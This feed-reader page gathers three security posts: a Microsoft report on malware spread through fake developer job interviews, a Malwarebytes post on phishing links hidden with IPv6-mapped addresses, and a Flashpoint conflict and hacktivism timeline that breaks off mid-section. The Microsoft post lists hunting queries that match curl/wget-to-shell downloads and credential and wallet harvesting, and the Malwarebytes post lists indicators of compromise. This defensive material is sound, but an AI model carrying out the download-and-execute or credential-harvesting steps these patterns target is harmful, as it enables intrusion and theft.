Reading view

Contagious Interview: Malware delivered through fake developer job interviews

Microsoft Defender Experts has observed the Contagious Interview campaign, a sophisticated social engineering operation active since at least December 2022. Microsoft continues to detect activity associated with this campaign in recent customer environments, targeting software developers at enterprise solution providers and media and communications firms by abusing the trust inherent in modern recruitment workflows.

Threat actors repeatedly achieve initial access through convincingly staged recruitment processes that mirror legitimate technical interviews. These engagements often include recruiter outreach, technical discussions, assignments, and follow-ups, ultimately persuading victims to execute malicious packages or commands under the guise of routine evaluation tasks.

This campaign represents a shift in initial access tradecraft. By embedding targeted malware delivery directly into interview tools, coding exercises, and assessment workflows developers inherently trust, threat actors exploit the trust job seekers place in the hiring process during periods of high motivation and time pressure, lowering suspicion and resistance.

Attack chain overview

Initial access

As part of a fake job interview process, threat actors pose as recruiters from cryptocurrency trading firms or AI-based solution providers. Victims who fall for the lure are instructed to clone and execute an NPM package hosted on popular code hosting platforms such as GitHub, GitLab, or Bitbucket. In this scenario, the executed NPM package directly loads a follow-on payload.

Execution of the malicious package triggers additional scripts that ultimately deploy the backdoor in the background. In recent intrusions, threat actors have adapted their technique to leverage Visual Studio Code workflows. When victims open the downloaded package in Visual Studio Code, they are prompted to trust the repository author. If trust is granted, Visual Studio Code automatically executes the repository’s task configuration file, which then fetches and loads the backdoor.

A typical repository hosted on Bitbucket, posing as a blockchain-powered game.
Sample task found in the repository (right: URL shortener redirecting to vercel.app).

Follow-up payloads: Invisible Ferret

In the early stages of this campaign, Invisible Ferret was primarily delivered via BeaverTail, an information stealer that also functioned as a loader. In more recent intrusions, however, Invisible Ferret is predominantly deployed as a follow-on payload, introduced after initial access has been established through the beaconing agent or OtterCookie.

Invisible Ferret is a Python-based backdoor used in later stages of the attack chain, enabling remote command execution, extended system reconnaissance, and persistent control after initial access has been secured by the primary backdoor.

Process tree snippet from an incident where the beaconing agent deploys Invisible Ferret.

Other Campaigns

Another notable backdoor observed in this campaign is FlexibleFerret, a modular backdoor implemented in both Go and Python variants. It leverages encrypted HTTP(S) and TCP command and control channels to dynamically load plugins, execute remote commands, and support file upload and download operations with full data exfiltration. FlexibleFerret establishes persistence through RUN registry modifications and includes built-in reconnaissance and lateral movement capabilities. Its plugin-based architecture, layered obfuscation, and configurable beaconing behavior contribute to its stealth and make analysis more challenging.

While Microsoft Defender Experts have observed FlexibleFerret less frequently than the backdoors discussed in earlier sections, it remains active in the wild. Campaigns deploying this backdoor rely on similar social engineering techniques, where victims are directed to a fraudulent interview or screening website impersonating a legitimate platform. During the process, users encounter a fabricated technical error and are instructed to copy and paste a command to resolve the issue. This command retrieves additional payloads, ultimately leading to the execution of the FlexibleFerret backdoor.

Code quality observations

Recent samples exhibit characteristics that differ from traditionally engineered malware. The beaconing agent script contains inconsistent error handling, empty catch blocks, and redundant reporting logic that appear minimally refined. Similarly, the FlexibleFerret Python variant combines tutorial-style comments, emoji-based logging, and placeholder secret key markers alongside functional malware logic.

These patterns, including instructional narrative structure and rapid iteration cycles, suggest development workflows that prioritize speed and functional output over refined engineering. While these characteristics may indicate the use of development acceleration tools, they primarily reflect evolving threat actor development practices and rapid tooling adaptation that enable quick iteration on malicious code.

Snippets from the Python variant of FlexibleFerret highlighting tutorial‑style comments and AI‑assisted code with icon‑based logging.

Security implications

This campaign weaponizes hiring processes into a persistent attack channel. Threat actors exploit technical interviews and coding assessments to execute malware through dependency installations and repository tasks, targeting developer endpoints that provide access to source code, CI/CD pipelines, and production infrastructure.

Threat actors harvest API tokens, cloud credentials, signing keys, cryptocurrency wallets, and password manager artifacts. Modular backdoors enable infrastructure rotation while maintaining access and complicating detection.

Organizations should treat recruitment workflows as attack surfaces by deploying isolated interview environments, monitoring developer endpoints and build tools, and hunting for suspicious repository activity and dependency execution patterns.

Mitigation and protection guidance

Harden developer and interview workflows

  • Use a dedicated, isolated environment for coding tests and take-home assignments (for example, a non-persistent virtual machine). Do not use a primary corporate workstation that has access to production credentials, internal repositories, or privileged cloud sessions.
  • Establish a policy that requires review of any recruiter-provided repository before running scripts, installing dependencies, or executing tasks. Treat “paste-and-run” commands and “quick fix” instructions as high-risk.
  • Provide guidance to developers on common red flags: short links redirecting to file hosts, newly created repositories or accounts, unusually complex “assessment” setup steps, and instructions that request disabling security controls or trusting unknown repository authors.

Reduce attack surface from tools commonly abused in this campaign

  • Ensure tamper protection and real-time antivirus protection are enabled, and that endpoints receive security updates. These campaigns often rely on script execution and commodity tooling rather than exploiting a single vulnerability, so layered endpoint protection remains effective.
  • Restrict scripting and developer runtimes where possible (Node.js, Python, PowerShell). In high-risk groups, consider application control policies that limit which binaries can execute and where they can be launched from (for example, preventing developer tool execution from Downloads and temporary folders).
  • Monitor for and consider blocking common “download-and-execute” patterns used as stagers, such as curl/wget piping to shells, and outbound requests to low-reputation hosts used to serve payloads (including short-link redirection services).

Protect secrets and limit downstream impact

  • Reduce the exposure of secrets on developer endpoints. Use just-in-time and short-lived credentials, store secrets in vaults, and avoid long-lived tokens in environment files or local configuration.
  • Enforce multifactor authentication and conditional access for source control, CI/CD, cloud consoles, and identity providers to mitigate credential theft from compromised endpoints.
  • Review and restrict access to password manager vaults and developer signing keys. This campaign explicitly targets artifacts such as wallet material, password databases, private keys, and other high-value developer-held secrets.

Detect, investigate, and respond

  • Hunt for execution chains that start from a code editor or developer tool and quickly transition into shell or scripting execution (for example, Visual Studio Code/Cursor App→ cmd/PowerShell/bash → curl/wget → script execution). Review repository task configurations and build scripts when such chains are observed.
  • Monitor Node.js and Python processes for behaviors consistent with this campaign, including broad filesystem enumeration for credential and key material, clipboard monitoring, screenshot capture, and HTTP POST uploads of collected data.
  • If compromise is suspected, isolate the device, rotate credentials and tokens that may have been exposed, review recent access to code repositories and CI/CD systems, and assess for follow-on payloads and persistence.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog. 

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.  

TacticObserved ActivityMicrosoft Defender Coverage
Executioncurl or wget command launched from NPM package to fetch script from vercel.app or URL shortnerMicrosoft Defender for Endpoint
Suspicious process execution
ExecutionBackdoor (Beaconing agent, OtterCookie, InvisibleFerret, FlexibleFerret) executionMicrosoft Defender for Endpoint
Suspicious Node.js process behavior
Possible OtterCookie malware activity
Suspicious Python library load
Suspicious connection to remote service

Microsoft Defender for Antivirus
Suspicious ‘BeaverTail’ behavior was blocked
Credential AccessEnumerating sensitive dataMicrosoft Defender for Endpoint
Enumeration of files with sensitive data
DiscoveryGathering basic system information and enumerating sensitive dataMicrosoft Defender for Endpoint
System information discovery
Suspicious System Hardware Discovery
Suspicious Process Discovery
CollectionClipboard data read by Node.js scriptMicrosoft Defender for Endpoint
Suspicious clipboard access

Hunting Queries

Microsoft Defender XDR  

Microsoft Defender XDR customers can run the following queries to find related activity in their networks.

Run the below query to identify suspicious script executions where curl or wget is used to fetch remote content.

DeviceProcessEvents
| where ProcessCommandLine has_any ("curl", "wget")
| where ProcessCommandLine has_any ("vercel.app", "short.gy") and ProcessCommandLine has_any (" | cmd", " | sh")

Run the below query to identify OtterCookie-related Node.js activity by correlating clipboard monitoring, recursive file scanning, curl-based exfiltration, and VM-awareness patterns.

DeviceProcessEvents
| where
    (
        (InitiatingProcessCommandLine has_all ("axios", "const uid", "socket.io") and InitiatingProcessCommandLine contains "clipboard") or // Clipboard watcher + socket/C2 style bootstrap
        (InitiatingProcessCommandLine has_all ("excludeFolders", "scanDir", "curl ", "POST")) or // Recursive file scan + curl POST exfil
        (ProcessCommandLine has_all ("*bitcoin*", "credential", "*recovery*", "curl ")) or // Credential/crypto keyword harvesting + curl usage
        (ProcessCommandLine has_all ("node", "qemu", "virtual", "parallels", "virtualbox", "vmware", "makelog")) or // VM / sandbox awareness + logging
        (ProcessCommandLine has_all ("http", "execSync", "userInfo", "windowsHide")
            and ProcessCommandLine has_any ("socket", "platform", "release", "hostname", "scanDir", "upload")) // Generic OtterCookie-ish execution + environment collection + upload hints
    )

Run the below query to detect possible Node.js beaconing agent activity.

DeviceProcessEvents
| where ProcessCommandLine has_all ("handleCode", "AgentId", "SERVER_IP")

Run the below query to detect possible BeaverTail and InvisibleFerret activity.

DeviceProcessEvents
| where FileName has "python" or ProcessVersionInfoOriginalFileName has "python"
| where ProcessCommandLine has_any (@'/.n2/pay', @'\.n2/pay', @'\.npl', '/.npl', @'/.n2/bow', @'\.n2/bow', '/pdown', '/.sysinfo', @'\.n2/mlip', @'/.n2/mlip')

Run the below query to detect credential enumeration activity.

DeviceProcessEvents
| where InitiatingProcessParentFileName has "node"
| where (InitiatingProcessCommandLine has_all ("cmd.exe /d /s /c", " findstr /v", '\"dir')
and ProcessCommandLine has_any ("account", "wallet", "keys", "password", "seed", "1pass", "mnemonic", "private"))
or ProcessCommandLine has_all ("-path", "node_modules", "-prune -o -path", "vendor", "Downloads", ".env")

Microsoft Sentinel  

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.   

References

This research is provided by Microsoft Defender Security Research with contributions from Balaji Venkatesh S.

Learn more   

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

Learn more about Protect your agents in real-time during runtime (Preview) – Microsoft Defender for Cloud Apps

Explore how to build and customize agents with Copilot Studio Agent Builder 

Microsoft 365 Copilot AI security documentation 

How Microsoft discovers and mitigates evolving attacks against AI guardrails 

Learn more about securing Copilot Studio agents with Microsoft Defender  

The post Contagious Interview: Malware delivered through fake developer job interviews appeared first on Microsoft Security Blog.

  •  

Phishers hide scam links with IPv6 trick in “free toothbrush” emails

A recurring lure in phishing emails impersonating United Healthcare is the promise of a free Oral-B toothbrush. But the interesting part isn’t the toothbrush. It’s the link.

two email examples
Two examples of phishing emails

Recently we found that these phishers have moved from using Microsoft Azure Blob Storage (links looking like this:

https://{string}.blob.core.windows.net/{same string}/1.html

to links obfuscated by using an IPv6-mapped IPv4 address to hide the IP in a way that looks confusing but is still perfectly valid and routable. For example:

http://[::ffff:5111:8e14]/

In URLs, putting an IP in square brackets means it’s an IPv6 literal. So [::ffff:5111:8e14] is treated as an IPv6 address.

::ffff:x:y is a standard form called an IPv4-mapped IPv6 address, used to represent an IPv4 address inside IPv6 notation. The last 32 bits (the x:y part) encode the IPv4 address.

So we need to convert 5111:8e14 to an IPv4 address. 5111 and 8e14 are hexadecimal numbers. In theory that means:

  1. 0x5111 in decimal = 20753
  2. 0x8e14 in decimal = 36372

But for IPv4-mapped addresses we really treat that last 32 bits as four bytes. If we unpack 0x51 0x11 0x8e 0x14:

  1. 0x51 = 81
  2. 0x11 = 17
  3. 0x8e = 142
  4. 0x14 = 20

So, the IPv4 address this URL leads to is 81.17.142.20

The emails are variations on a bogus reward from scammers pretending to be United Healthcare that uses a premium Oral‑B iO toothbrush as bait. Victims are sent to a fast‑rotating landing page where the likely endgame is the collection of personally identifiable information (PII) and card data under the guise of confirming eligibility or paying a small shipping fee.

How to stay safe

What to do if you entered your details

If you submitted your card details:

  • Contact your bank or card issuer immediately and cancel the card
  • Dispute any unauthorized charges
  • Don’t wait for fraud to appear. Stolen card data is often used quickly
  • Change passwords for accounts linked to the email address you provided
  • Run a full scan with a reputable security product

Other ways to stay safe:

Indicators of Compromise (IOCs)

81.17.142.40

15.204.145.84

redirectingherenow[.]com

redirectofferid[.]pro


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

  •  

Escalation in the Middle East: Tracking “Operation Epic Fury” Across Military and Cyber Domains

Blogs

Blog

Escalation in the Middle East: Tracking “Operation Epic Fury” Across Military and Cyber Domains

This post tracks the convergence of kinetic warfare, psychological operations, and cyber activity as the conflict expands across the Middle East and beyond.

SHARE THIS:
Default Author Image
March 11, 2026

On February 28, the United States and Israel launched coordinated strikes across Iran under Operation Epic Fury (also referenced in reporting as Operation Lion’s Roar). The opening phase focused on decapitating senior Iranian leadership while degrading missile infrastructure, launch systems, and air defenses. In the hours that followed, Iran initiated large-scale retaliation — expanding the conflict beyond Iranian territory and into a region-wide exchange that touched multiple Gulf states and allied military assets.

Since those initial strikes, the conflict has rapidly widened and accelerated. What began as a concentrated campaign against leadership and missile capabilities has developed into a sustained regional war with an expanding set of targets, including economic and logistical infrastructure. Simultaneously, cyber operations and psychological messaging have been used alongside kinetic action, creating a hybrid operating environment in which disruption is shaped as much by information control and infrastructure compromise as it is by missiles and airstrikes.

Flashpoint analysts are tracking the conflict across physical, cyber, and geopolitical domains. The timeline and sections below summarize key developments and risk indicators observed from February 28 through March 10.

Operation Epic Fury Timeline: March 2026 Conflict Updates

February 28, 2026 — Initial Strikes and Regional Retaliation

Feb 28
07:00 UTC
US and Israeli forces launch coordinated operations targeting Iranian missile sites and strategic infrastructure.
07:30 UTC
Strike reported on Supreme Leader Ali Khamenei’s compound/office in Tehran; subsequent updates describe his death as confirmed.
08:04 UTC
Missile strike hits a girls’ school in Minab; reports indicate significant civilian casualties.
13:30 UTC
Iran retaliates with reported strikes against Jebel Ali port (Dubai) and Camp Arifjan (Kuwait).
15:00 UTC
Ballistic missiles target Al Udeid (Qatar) and Ali Al Salem (Kuwait) air bases.
17:40 UTC
A Shahed-136 drone hits a radar installation at the US Naval Support Activity in Bahrain (5th Fleet-associated).
20:00 UTC
Iran launches a wave of missiles toward Israel (reported as ~125).

In parallel to these events, Flashpoint observed immediate system-level disruption: flight suspensions at Dubai airports following nearby strikes, and Iran’s move to blockade the Strait of Hormuz, elevating global energy and logistics risk.

March 1, 2026 — Air War Over Tehran, Soft Targets, and Hybrid Expansion

By March 1, the conflict had shifted from stand-off strikes to direct air operations over Tehran, signaling degradation of Iran’s integrated air defenses over the capital. Iranian state media described a transition to “offensive defense,” and retaliatory activity expanded across the region.

Notable developments included the reported strike on the Crowne Plaza Hotel in Manama, Bahrain, signaling increased risk to soft targets and commercial environments. Flashpoint also observed indicators of command-and-control friction on the Iranian side, including a reported friendly-fire incident involving the sanctioned “shadow fleet” tanker Skylight.

Mar 1
01:30 UTC
Press TV announces a massive retaliatory wave against US and Israeli bases.
04:45 UTC
A massive explosion rocks Erbil, Iraq, near US and coalition facilities.
05:30 UTC
Israeli Defense Minister Israel Katz confirms IAF jets are now dropping heavy munitions directly over Tehran.
06:15 UTC
The “shadow fleet” tanker Skylight (previously sanctioned by the US) is struck by an Iranian missile in a friendly-fire incident.
07:00 UTC
An Iranian projectile strikes the Crowne Plaza Hotel in Manama, Bahrain, causing multiple civilian casualties.
09:00 UTC
IDF confirms the mobilization of 100,000 reservists to defend against Iran and its regional proxies.
11:30 UTC
Heavy, continuous IAF bombardment of IRGC command-and-control sites in Tehran is reported.
13:15 UTC
An Iranian Shahed drone successfully hits the American Ali Al Salem Air Base in Kuwait.
15:00 UTC
UK Prime Minister Keir Starmer announces the deployment of experienced Ukrainian counter-UAS operators to the Gulf.
18:30 UTC
IDF confirms Hezbollah has begun firing missiles from Lebanon, opening a major new front in the north.
20:00 UTC
IRGC claims waves 7 and 8 of “Operation True Promise 4” are underway, declaring the Ali Al Salem base “completely disabled”.

March 2, 2026 — Infrastructure and Economic Warfare Escalation

Mar 2
Early AM
Iranian Shahed-136 drones strike Saudi Aramco’s Ras Tanura facility.
AM
AWS confirms its UAE data center was impacted by physical attacks, resulting in significant service disruptions.
12:35 UTC
n unmanned drone strikes the runway of the UK’s RAF Akrotiri base in Cyprus.
~17:00 UTC
IDF issues evacuation warnings for Tehran’s Evin district and Southern Beirut.
21:00 UTC
CENTCOM confirms six US service members killed in action (updated figure).
PM
Israeli airstrikes destroy Iran’s national broadcasting headquarters (IRIB) and the Assembly of Experts’ building in Tehran.
Late PM
US forces confirm Iran’s naval capability in the Gulf of Oman has been neutralized (reported sinking of all 11 previously active warships).

March 3, 2026 — Expansion of Infrastructure Warfare and Regional Combat

Mar 3
Early AM
IAF strikes the Iranian Regime’s Leadership Compound, dismantling a heavily secured leadership site.
AM
An Iranian drone attack sets the US Consulate in Dubai on fire; France deploys Rafale jets to protect military bases in the UAE.
~13:00 UTC
An airstrike hits the Defense Ministry’s Iran Electronics Industries facility in Isfahan.
PM
US and Israeli forces destroy Mehrabad Airport in Tehran to prevent regime officials from fleeing.
18:00 UTC
A Farsi-language numbers station appears on 7910 kHz radio frequencies, believed to be transmitting coded instructions to sleeper cells.
PM
The White House releases the full objectives of Operation Epic Fury, defining it as a major combat operation focused on destroying Iran’s missile and naval forces.
Late PM
A GBU-31 bunker-buster strike destroys an IRGC-linked site in Urmia.

March 5, 2026 — Offensive Defense and Geographic Expansion

Mar 5
04:00 UTC
Iranian attack drones strike Nakhchivan International Airport in Azerbaijan, causing explosions near civilian infrastructure.
06:30 UTC
Azerbaijan’s Ministry of Defence places its military on highest alert and prepares potential retaliatory measures.
09:15 UTC
A complex missile and drone attack triggers a major fire at Ali Al Salem Air Base in Kuwait.
11:45 UTC
The Israeli Air Force conducts large-scale strikes against roughly 200 targets in western and central Iran, focusing on ballistic missile launch systems.
18:00 UTC
Iraq’s national power grid reportedly collapses, resulting in a nationwide.

March 6, 2026 — Regime Fragmentation and Strategic Targeting

Mar 6
AM
Approximately 50 Israeli aircraft drop more than 100 bombs on an underground bunker within Tehran’s leadership compound, reportedly eliminating remaining senior regime figures.
AM
US forces destroy a hidden Iranian ballistic missile factory located inside Tehran.
Mid-Day
Israeli Air Force eliminates Hossein Taeb, former head of the IRGC Intelligence Organization, in a targeted strike on his residence.
PM
Azerbaijan begins moving artillery and military equipment toward the Iranian border while evacuating diplomatic personnel from Tehran and Tabriz.
Active
Mehrabad International Airport remains under heavy combined US–Israeli bombardment as strikes continue against remaining regime infrastructure.
Late PM
US leadership issues a public demand for Iran’s “unconditional surrender,” rejecting negotiated settlement proposals.

March 8–9, 2026 — Leadership Consolidation and Hybrid Warfare Expansion

Mar 8
Mar 8
Mojtaba Khamenei is officially appointed Supreme Leader following the death of Ayatollah Ali Khamenei.
Mar 8
Israeli forces kill Abolghasem Babaeian, newly appointed military secretary to the Supreme Leader, in a rapid-response airstrike in Tehran.
22:46 UTC
Hacktivist group Cyber Islamic Resistance claims defacement of the Kurdish Peshmerga special forces website (unverified).
23:23 UTC
Cyber Islamic Resistance claims control of a Saudi medical care application website (unverified).
Mar 9
Mar 9
Bahraini desalination and oil infrastructure is struck, causing injuries and triggering a declaration of force majeure.
Mar 9
Grand Ayatollah Sistani issues a fatwa declaring a “collective religious obligation” for communal defense.
11:12 UTC
Pro-Russian hacktivist group NoName057(16) claims DDoS attacks against Israeli political parties and defense contractor Elbit Systems.
15:26 UTC
Reporting confirms the Iranian MOIS-linked group MuddyWater has infiltrated US aerospace and defense networks.
16:06 UTC
Iran’s nationwide internet blackout enters its sixth day.

March 10, 2026 — Decentralized Retaliation and Economic Pressure

Mar 10
13:35 UTC
Multiple reports indicate that major Iranian banks, including Bank Melli Iran and Bank Sepah, are unable to provide services following suspected cyberattacks.
15:20 UTC
A drone strike hits the Ruwais industrial complex in Abu Dhabi, forcing the shutdown of the Middle East’s largest oil refinery.
18:00 UTC
The UAE Defense Ministry reports intercepting hundreds of projectiles over a 24-hour period, confirming six deaths and more than 120 injuries.

March 1–10, 2026 — Infrastructure Targeting and Internationalization

Between March 1 and March 10, Flashpoint analysis indicates the conflict has evolved from broad regional exchanges into systematic targeting of energy, data, and command-and-control infrastructure with global downstream impact. Key reported incidents included a strike on Saudi Aramco’s facility at Ras Tanura and a disruption at an AWS data center in the UAE attributed to physical impact on the facility. The Israel–Lebanon front also intensified following Hezbollah missile launches and a broad Israeli response across Lebanon. March 2 also featured expanded strikes against Tehran’s state apparatus, including reported destruction of Iran’s national broadcasting headquarters and the Assembly of Experts’ building.

Flashpoint also tracked growing exposure for NATO-aligned assets, including reported damage at RAF Akrotiri (Cyprus). Meanwhile, the UK, France, and Germany signaled readiness to support action focused on Iran’s missile and drone capabilities — an indicator of potential further conflict expansion.

By March 3 and March 4, targeting patterns expanded further to include strategic communications infrastructure and hardened military facilities. Satellite analysis confirmed damage to US military communication nodes and early-warning radar infrastructure across multiple Gulf bases, while naval combat escalated with a US submarine sinking the Iranian frigate IRIS Dena in the Indian Ocean. These developments signal a shift toward degrading regional command-and-control networks alongside continued pressure on energy and logistics infrastructure.

Developments on March 5 further expanded the geographic scope of the conflict. Iranian drone strikes targeted infrastructure in Azerbaijan, drawing the country’s military onto high alert and raising the possibility of a northern expansion of the kinetic theater. At the same time, complex missile and drone attacks continued against US military facilities in the Gulf, including a major strike that caused significant damage at Ali Al Salem Air Base in Kuwait. These developments reflect a continued shift toward distributed regional engagements rather than isolated bilateral exchanges.

Developments on March 6 through March 9 indicate continued degradation of Iranian command infrastructure alongside widening regional impacts. Precision strikes reportedly targeted remaining Iranian leadership compounds and clandestine missile and nuclear facilities, while diplomatic evacuations and military mobilization along Iran’s northern border suggested the potential expansion of the conflict into new geographic theaters. At the same time, infrastructure targeting expanded beyond energy and communications to include water desalination facilities and additional cloud and data infrastructure, highlighting the growing risk to civilian survival systems and regional economic stability.

Developments on March 10 further underscored the economic dimension of the conflict. A drone strike on the Ruwais industrial complex in Abu Dhabi forced the shutdown of the region’s largest oil refinery, while global shipping giant MSC suspended exports from Gulf ports due to continued instability in the Strait of Hormuz. These disruptions highlight how the conflict is increasingly affecting global energy production and maritime supply chains beyond the immediate combat zone.

The Escalating Cyber and Information Front

From the opening hours, Flashpoint assessed that cyber activity in this conflict is not ancillary — it is being used as a synchronized force multiplier.

One of the most consequential developments has been the use of infrastructure compromise for psychological operations at national scale. Flashpoint observed the compromise of the BadeSaba prayer app ecosystem, enabling push notifications to be delivered to large user populations. Messaging included calls for mobilization and later content aimed at regime security forces and protest coordination. This reflects a shift from influence on social platforms toward platform-layer manipulation, where trusted everyday applications become vectors for narrative control during kinetic shock.

Flashpoint also observed disruption and interference affecting state-run Iranian outlets (including IRNA and ISNA), contributing to an information vacuum and driving users toward unverified channels for situational awareness.

As kinetic pressure increased, Flashpoint tracking indicated fluctuations in cyber tempo. Some updates suggested a temporary lull in broader Iranian cyber activity — potentially due to operational disruption from physical strikes — while other indicators pointed to a risk of renewed disruptive campaigns, including activity linked to personas associated with state-aligned hacktivist ecosystems.

On March 2, Flashpoint observed reporting on a coordinated campaign branded #OpIsrael, involving pro-Iranian and pro-Russian-aligned actors, with activity spanning DDoS, data exposure, and claimed intrusions.

  • NoName057(16) + Cyber Islamic Resistance: Claimed large-scale DDoS activity targeting Israeli defense and municipal entities (including Elbit Systems).
  • Cyber Islamic Resistance: Claimed breach of an Israeli health insurance provider and released internal CCTV footage as evidence of access.
  • FAD Team (Iraq’s “Resistance Hub”): Claimed SQL injection activity and PII exposure across a wide set of targets, including US and non-US entities.
  • Fatimion Cyber Team: Claimed disruption targeting Gulf states perceived as US-aligned, including Bahrain and Qatar-linked targets.
  • Infrastructure claims: FAD Team claimed access to firewall monitoring dashboards in Mecca and Medina.

Additional activity observed March 3–4 includes:

  • Handala Team: Claimed a breach of Saudi Aramco infrastructure and released internal documentation and schematics intended to validate the attack. Flashpoint has not verified these claims.
  • PalachPro: Signaled coordination with Iranian hackers to amplify cyber campaigns targeting US and Israeli organizations.
  • NoName057(16): Claimed access to an Israeli water management SCADA system under the ongoing #OpIsrael campaign. These claims remain unverified.
  • Fatemiyoun Electronic Team: Conducted a denial-of-service attack against the Kuwaiti News Agency website.
  • Targeting rhetoric shift: Pro-IRGC propaganda channels began framing major technology companies — including Google — as potential targets due to alleged support of US military operations.

Additional activity reported on March 5 indicates a renewed surge in coordinated cyber operations under the #OpIsrael banner:

  • NoName057(16): Claimed administrative access to Israeli industrial control systems and SCADA interfaces, alleging the ability to manipulate pump activity and water flow. These claims remain unverified but represent a high-risk threat to essential services.
  • Handala Group: Claimed the exfiltration and wiping of approximately 1.3 TB of data from Atlas Insurances Ltd., while simultaneously launching a doxxing campaign targeting individuals alleged to be connected to Israeli intelligence.
  • Fatemiyoun Electronic Team: Claimed responsibility for taking multiple government ministry websites offline in Jordan and Kuwait and releasing personal data from a Kuwaiti government application.
  • Cyber Islamic Resistance (Team 313): Claimed disruptions targeting Bahraini government infrastructure and published images allegedly taken from compromised surveillance camera networks.

Additional activity reported March 6–9 includes:

  • MuddyWater (MOIS / Seedworm): Verified intrusions into US aerospace, defense, aviation, and financial networks using a newly identified backdoor known as “Dindoor.” These operations reportedly began prior to the kinetic phase of the conflict and have continued during the war.
  • Telegram-Based Recruitment Networks: Iranian intelligence is reportedly using Telegram channels to recruit loosely affiliated operatives and criminal intermediaries across Europe for espionage and potential sabotage operations.
  • Handala: Claimed to have wiped Israeli military weather servers and intercepted urban security feeds in Jerusalem (unverified).
  • Cyber Islamic Resistance (Team 313): Claimed multiple website defacements targeting regional institutions, including Kurdish and Saudi organizations (unverified).
  • NoName057(16): Continued distributed denial-of-service attacks under the #OpIsrael banner targeting Israeli political parties, telecommunications companies, and defense contractors.

Additional activity reported March 10 includes:

  • Suspected banking-sector attacks: Multiple reports indicate that Iran’s largest banks, including Bank Melli Iran and Bank Sepah, experienced widespread service disruptions following suspected cyberattacks.
  • NoName057(16): The pro-Russian group continued operations under the #OpIsrael banner, claiming distributed denial-of-service attacks targeting Israeli and Cypriot infrastructure, including Israel’s national water company Mekorot and UAV firm E.M.I.T. Aviation (unverified).
  • BD Anonymous & MrSutrator Alliance: A newly formed pro-Palestinian cyber alliance announced “Operation Electronic Holocaust,” targeting Israeli defense contractor Rafael (unverified).
  • DieNet: The group issued warnings of a potential large-scale cyber campaign targeting Israeli government infrastructure (unverified).

These developments indicate continued expansion of cyber activity across both offensive and retaliatory fronts, including financial infrastructure and public-facing services.

Strategic Chokepoints and Systemic Risk

Two chokepoints have emerged as persistent systemic risk drivers: maritime energy transit and regional air mobility.

Iran’s reported blockade of the Strait of Hormuz remains the primary near-term global economic concern. Flashpoint reporting also indicates an explicit escalation toward energy system disruption, with IRGC messaging framing a “war on energy supplies” and kinetic targeting expanding to oil and gas infrastructure. Even partial disruption introduces immediate volatility in energy markets and maritime logistics, increasing shipping costs, insurance premiums, and delivery delays well beyond the region.

Additional developments reported on March 3 indicate the IRGC has conducted strikes against multiple oil tankers operating in the Strait of Hormuz, further elevating risks to global energy transport. Iran has also declared the waterway effectively closed to most commercial shipping, introducing the possibility of sustained maritime disruption.

Infrastructure targeting has expanded to include desalination facilities and water supply systems in the Gulf. Because these plants provide essential potable water to large urban populations, attacks on desalination infrastructure represent a significant escalation that directly threatens civilian survival systems and urban stability across the region.

Global shipping disruption has also intensified. As of March 10, following continued instability and the effective closure of the Strait of Hormuz, major shipping firms including MSC have suspended exports from Gulf ports, introducing additional pressure on global logistics and energy markets.

Airspace disruption and interruptions to transit hubs — especially the reported suspensions affecting Dubai — compound that risk. Taken together, the maritime and aviation constraints create a reinforcing cycle: constrained routes increase congestion elsewhere, raise operational costs, and compress the time available for organizations to reroute people and goods.

With regional airports and Gulf maritime corridors under threat, organizations should plan for sustained degradation of commercial mobility and service availability rather than short-lived closures.

Business and Security Implications

As the conflict expands into commercial infrastructure and civilian logistics, enterprise exposure now extends well beyond traditional “high-risk” sectors. The targeting patterns observed throughout this conflict indicate that energy infrastructure, cloud assets, maritime corridors, and civilian-facing systems are all within scope.

Organizations should plan for volatility across personnel security, supply chains, cyber disruption, and regional service availability.

1. Personnel and Physical Security

Recent incidents including strikes near Gulf transit hubs, the targeting of a Western-branded hotel in Bahrain, and warnings regarding potential asymmetric attacks underscore that risk is no longer confined to military installations.

  • The US State Department issued an expanded “DEPART NOW” advisory for Americans across 16 Middle Eastern countries, reflecting elevated risk to civilian and commercial environments.
  • US Embassy in Amman reported active “duck and cover” alarms, signaling increased threat pressure on diplomatic facilities beyond core combat zones.
  • Reporting indicates Iranian threats now extend to US bases in Europe, expanding the geographic risk envelope.
  • Drone attacks targeting diplomatic facilities — including the US Consulate in Dubai and attempted strikes on the US Embassy in Riyadh — indicate expanding risk to diplomatic and government installations.
  • Precautionary evacuations have also been implemented near US embassies across several Gulf states as regional tensions and retaliatory threats continue to rise.

Organizations with personnel in the Gulf region and surrounding areas should:

  • Reassess travel posture to the UAE, Qatar, Bahrain, Kuwait, and Saudi Arabia.
  • Elevate security protocols at commercial offices, hotels, and logistics facilities.
  • Reinforce operational security practices (routine variation, avoidance of identifiable clothing tied to government or defense sectors).
  • Coordinate closely with local authorities and diplomatic advisories regarding movement restrictions and emerging threat indicators.

2. Supply Chain and Energy Exposure

The reported blockade of the Strait of Hormuz, disruption to Dubai aviation, and the strike on Saudi Arabia’s Ras Tanura oil facility demonstrate that global energy and logistics systems are active pressure points. Iranian naval forces reportedly struck multiple oil tankers transiting the Strait of Hormuz on March 3, increasing the likelihood of extended maritime disruption and global energy price volatility.

IRGC statements framing a “war on energy supplies” increase the likelihood of sustained pressure on Gulf oil and gas infrastructure. Organizations must reassess exposure not only to energy price volatility, but also to infrastructure-driven availability shocks.

Organizations should:

  • Model extended disruption to Gulf maritime routes rather than short-term interruption.
  • Identify alternative shipping corridors and overland routing options.
  • Stress-test supplier dependencies tied to Gulf ports or energy inputs.
  • Prepare for price volatility and delivery delays impacting downstream operations.

3. Cloud and Technology Infrastructure

